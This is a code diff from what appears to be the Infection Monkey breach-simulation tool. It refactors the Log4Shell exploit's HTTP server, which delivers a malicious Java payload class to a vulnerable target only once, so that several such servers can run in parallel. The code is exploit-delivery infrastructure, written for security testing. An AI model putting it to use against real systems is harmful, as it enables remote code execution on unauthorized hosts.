diff --git a/monkey/infection_monkey/exploit/log4shell_utils/exploit_class_http_server.py b/monkey/infection_monkey/exploit/log4shell_utils/exploit_class_http_server.py index 612bda270..5fc6521bd 100644 --- a/monkey/infection_monkey/exploit/log4shell_utils/exploit_class_http_server.py +++ b/monkey/infection_monkey/exploit/log4shell_utils/exploit_class_http_server.py @@ -7,38 +7,36 @@ logger = logging.getLogger(__name__) HTTP_TOO_MANY_REQUESTS_ERROR_CODE = 429 -# If we need to run multiple HTTP servers in parallel, we'll need to either: -# 1. Use multiprocessing so that each HTTPHandler class has its own class_downloaded variable -# 2. Create a metaclass and define the handler class dymanically at runtime -class HTTPHandler(http.server.BaseHTTPRequestHandler): +def do_GET(self): + with self.download_lock: + if self.class_downloaded.is_set(): + self.send_error( + HTTP_TOO_MANY_REQUESTS_ERROR_CODE, + "Java exploit class has already been downloaded", + ) + return - java_class: bytes - class_downloaded: threading.Event - download_lock: threading.Lock + self.class_downloaded.set() - @classmethod - def initialize(cls, java_class: bytes, class_downloaded: threading.Event): - cls.java_class = java_class - cls.class_downloaded = class_downloaded - cls.download_lock = threading.Lock() + logger.info("Java class server received a GET request!") + self.send_response(200) + self.send_header("Content-type", "application/octet-stream") + self.end_headers() + logger.info("Sending the payload class!") + self.wfile.write(self.java_class) - def do_GET(self): - with HTTPHandler.download_lock: - if HTTPHandler.class_downloaded.is_set(): - self.send_error( - HTTP_TOO_MANY_REQUESTS_ERROR_CODE, - "Java exploit class has already been downloaded", - ) - return - HTTPHandler.class_downloaded.set() - - logger.info("Java class server received a GET request!") - self.send_response(200) - self.send_header("Content-type", "application/octet-stream") - self.end_headers() - logger.info("Sending the payload class!") - self.wfile.write(self.java_class) +def get_new_http_handler_class(java_class: bytes, class_downloaded: threading.Event): + return type( + "http_handler_class", + (http.server.BaseHTTPRequestHandler,), + { + "java_class": java_class, + "class_downloaded": class_downloaded, + "download_lock": threading.Lock(), + "do_GET": do_GET, + }, + ) class ExploitClassHTTPServer: @@ -62,9 +60,9 @@ class ExploitClassHTTPServer: self._class_downloaded = threading.Event() self._poll_interval = poll_interval - HTTPHandler.initialize(java_class, self._class_downloaded) + http_handler_class = get_new_http_handler_class(java_class, self._class_downloaded) - self._server = http.server.HTTPServer((ip, port), HTTPHandler) + self._server = http.server.HTTPServer((ip, port), http_handler_class) # Setting `daemon=True` to save ourselves some trouble when this is merged to the # agent-refactor branch. # TODO: Make a call to `create_daemon_thread()` instead of calling the `Thread()`